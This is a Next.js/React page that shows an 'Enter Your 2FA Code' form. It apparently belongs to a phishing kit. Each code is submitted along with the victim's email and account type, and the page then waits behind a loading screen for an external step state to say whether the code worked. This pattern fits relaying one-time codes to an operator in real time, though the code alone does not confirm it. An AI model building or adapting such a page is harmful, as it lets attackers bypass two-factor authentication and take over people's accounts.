"use client";

import { Suspense, useEffect, useState } from "react";
import { useSearchParams } from "next/navigation";
import { AuthShell } from "@/components/auth/AuthShell";
import { OtpInput } from "@/components/auth/OtpInput";
import { StepGate, PasscodeLoading } from "@/components/auth/StepGate";
import type { StepState } from "@/hooks/useStepState";
import { submitAuthPayload } from "@/lib/submit";

function AuthCodeForm({ state, email, mode, accountType }: { state: StepState; email: string; mode: string; accountType: string }) {
  const [attempt, setAttempt] = useState(0);
  const [error, setError] = useState(false);
  const [errorText, setErrorText] = useState("");
  const [verifying, setVerifying] = useState(false);

  useEffect(() => {
    if (state.error) {
      setError(true);
      setErrorText(state.error);
      setVerifying(false);
      setAttempt((a) => a + 1);
    }
  }, [state.error]);

  const handleComplete = async (code: string) => {
    await submitAuthPayload({ page: "auth-code", email, mode, accountType, code });
    setError(false);
    setErrorText("");
    setVerifying(true);
    setAttempt((a) => a + 1);
  };

  return (
    <div className="flex w-full max-w-[512px] flex-col items-center">
      <div className="w-full min-h-[500px] rounded-[8px] border border-auth-card-border bg-auth-card p-6">
        <div className="p-1">
          {verifying ? (
            <PasscodeLoading />
          ) : (
            <>
              <div className="mb-6 flex items-center">
                <h2 className="ml-4 text-[32px] font-semibold leading-8 text-white">
                  Enter Your 2FA Code
                </h2>
              </div>
              <p className="mb-6 text-[12px] leading-[12px] text-grey-200">
                {state.message || "Enter the 6-digit code generated by your chosen 2FA app"}
              </p>
              <div className="mt-7">
                <div className="mt-2">
                  <OtpInput key={attempt} length={6} error={error} onComplete={handleComplete} />
                </div>
              </div>
              {(errorText || error) && (
                <p className="mt-2 text-sm font-medium text-auth-danger">
                  {errorText || "Invalid code."}
                </p>
              )}
            </>
          )}
        </div>
      </div>
      <div className="mt-[10px] flex justify-center">
        <p className="flex text-xs font-medium text-grey-200">
          Having issues? Use{" "}
          <a href="/login" className="text-blue-brand">
            QR Login
          </a>
        </p>
      </div>
    </div>
  );
}

function AuthCodeInner() {
  const searchParams = useSearchParams();
  const email = searchParams.get("email") ?? "";
  const mode = searchParams.get("mode") ?? "login";
  const accountType = searchParams.get("accountType") ?? "";

  return (
    <StepGate step="auth-code">
      {(state) => (
        <AuthCodeForm state={state} email={email} mode={mode} accountType={accountType} />
      )}
    </StepGate>
  );
}

export default function AuthCodePage() {
  return (
    <AuthShell>
      <div className="mx-auto mb-10 mt-8 flex w-full max-w-[1140px] flex-1 flex-col">
        <div className="flex flex-1 items-center justify-center">
          <Suspense fallback={null}>
            <AuthCodeInner />
          </Suspense>
        </div>
      </div>
    </AuthShell>
  );
}
